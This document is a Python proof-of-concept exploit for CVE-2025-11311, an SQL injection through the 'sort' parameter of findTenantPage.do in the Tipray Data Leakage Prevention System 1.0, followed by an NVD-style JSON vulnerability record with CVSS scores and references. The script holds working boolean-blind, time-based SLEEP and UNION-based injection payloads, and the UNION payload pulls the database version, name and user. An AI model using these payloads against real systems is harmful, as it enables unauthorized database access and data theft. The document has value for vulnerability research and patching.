CVE-2025-11311

# CVE-2025-11311 PoC - SQL Injection in Tipray DLP System # Vulnerability: SQL Injection via sort parameter in findTenantPage.do # Affected: Tipray Data Leakage Prevention System v1.0 import requests target_url = "http://target-host:8080" endpoint = "/findTenantPage.do" # Normal request to verify the endpoint is accessible def check_endpoint(): url = f"{target_url}{endpoint}" params = { "page": "1", "limit": "10", "sort": "id" } try: resp = requests.get(url, params=params, timeout=10) print(f"[+] Endpoint status: {resp.status_code}") return resp.status_code == 200 except Exception as e: print(f"[-] Connection error: {e}") return False # Boolean-based blind SQL injection via sort parameter def exploit_blind_injection(): url = f"{target_url}{endpoint}" # Inject ORDER BY clause with CASE WHEN for boolean-based blind injection payload = "id,(CASE WHEN (1=1) THEN id ELSE (SELECT 1 UNION SELECT 2) END)" params = { "page": "1", "limit": "10", "sort": payload } try: resp_true = requests.get(url, params=params, timeout=10) payload_false = "id,(CASE WHEN (1=2) THEN id ELSE (SELECT 1 UNION SELECT 2) END)" params["sort"] = payload_false resp_false = requests.get(url, params=params, timeout=10) if resp_true.status_code != resp_false.status_code or resp_true.text != resp_false.text: print("[+] Target is vulnerable to SQL injection!") return True else: print("[-] Target may not be vulnerable") return False except Exception as e: print(f"[-] Exploit error: {e}") return False # Time-based blind SQL injection def exploit_time_based(): url = f"{target_url}{endpoint}" # Using IF/SLEEP for time-based detection payload = "id,IF(1=1,SLEEP(5),0)" params = { "page": "1", "limit": "10", "sort": payload } try: resp = requests.get(url, params=params, timeout=15) if resp.elapsed.total_seconds() >= 5: print("[+] Time-based SQL injection confirmed!") return True else: print("[-] Time-based injection not detected") return False except Exception as e: print(f"[-] Time-based exploit error: {e}") return False # UNION-based SQL injection to extract data def exploit_union_injection(): url = f"{target_url}{endpoint}" # Attempt UNION-based injection to extract database version payload = "1 UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10--" params = { "page": "1", "limit": "10", "sort": payload } try: resp = requests.get(url, params=params, timeout=10) if resp.status_code == 200 and ("MySQL" in resp.text or "Oracle" in resp.text or "PostgreSQL" in resp.text): print("[+] UNION injection successful!") print(f"[+] Response: {resp.text[:500]}") return True except Exception as e: print(f"[-] UNION exploit error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-11311 - Tipray DLP SQL Injection PoC") print("[*] Checking target...") if check_endpoint(): print("[*] Attempting blind injection...") exploit_blind_injection() print("[*] Attempting time-based injection...") exploit_time_based() print("[*] Attempting UNION injection...") exploit_union_injection()

{"cve": {"id": "CVE-2025-11311", "sourceIdentifier": "[email protected]", "published": "2025-10-06T00:15:37.477", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. The impacted element is the function findTenantPage of the file findTenantPage.do. The manipulation of the argument sort leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tipray:data_leakage_prevention_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "25FED908-237A-432E-9605-57E982321BD3"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-3.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327192", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327192", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.663451", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}